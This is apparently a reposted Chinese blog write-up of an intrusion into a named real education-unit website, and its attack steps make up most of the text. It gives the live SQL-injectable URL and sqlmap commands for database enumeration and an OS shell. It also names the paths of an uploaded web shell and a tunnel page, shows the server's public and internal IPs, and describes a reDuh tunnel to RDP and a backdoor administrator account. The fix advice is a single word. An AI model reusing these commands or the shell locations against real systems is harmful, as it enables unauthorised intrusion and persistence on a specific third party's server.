网址:http://shy.hpe.sh.cn
一个sql注入导致的服务器沦陷。
一个事业教育单位,今天就上服务器看看.(声明:未有任何破坏性操作)
没事溜达到这个网址:(注入点)
http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169
首先是暴库(16个数据库吧):
sqlmap -u "http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" –dbs
DBA权限:
管理员:
脱裤暴表就没弄了,要这些数据也没啥用。选择了利用这个渗透进服务器。
下面说重点了。os-shell
sqlmap -u "http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" –os-shell
比较奇怪sqlmap里执行os-shell不顺手,有点问题,现在就是写个马进去就行了。
果断换了种方式写了个一句话:
之前报错信息已经暴漏了网站的物理地址,马的物理位置:
d:\mainweb\ParentSchool\CN\jxhd\import.aspx
直接上服务器:
至此,已经拥有了这台服务器的shell了。
上了个文件getinfo.aspx,这个getinfo.aspx是我等下要用到的。
到这里就在想能否RDP进服务器看看。菜刀里看的着实不舒服。
得到的公网IP信息:
Nmap scan report for 210.22.116.91
Host is up (0.011s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
就开了个80端口。
在菜刀里ipconfig下看到的是:
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::852a:c63b:2d0a:b032%10
IPv4 地址 . . . . . . . . . . . . : 10.11.124.5
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 10.11.124.1
原来是这样的:
公网ip地址:210.22.116.91 这个只开了80端口
内网ip地址:10.11.124.5
要么是防火墙,要么做了端口映射,直接访问内网ip地址:10.11.124.5肯定是不行的了。怎么办?
上面的上传的那个getinfo.aspx文件的作用来了。
这里reDuh隧道穿透了:
java -jar reDuhClient.jar http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/getinfo.aspx
给大家弄个截图,大致会出现下面界面:
打开本地1010端口,使用telnet或者nc连接本地的1010端口:
创建隧道:[createTunnel]1234:127.0.0.1:3389
nc本地1010端口,将本地1234端口与远程的服务器端3389端口绑定
ok,基本工作均已完成。下面在用菜刀添加个用户:
密码就不显示了。
提升权限至administrators组
好了,这就全部完成了:
mstsc打开本地127.0.0.1:1234端口,输入刚添加的用户名密码。直接RDP进内网吧:
这样就想操作你自己的电脑一样了,想干什么就干什么。漏洞证明:
如上。
一句话:
http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/import.aspx
RDP隧道:
http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/getinfo.aspx修复方案:
过滤
原文链接:https://blog.csdn.net/weixin_39782709/article/details/119307574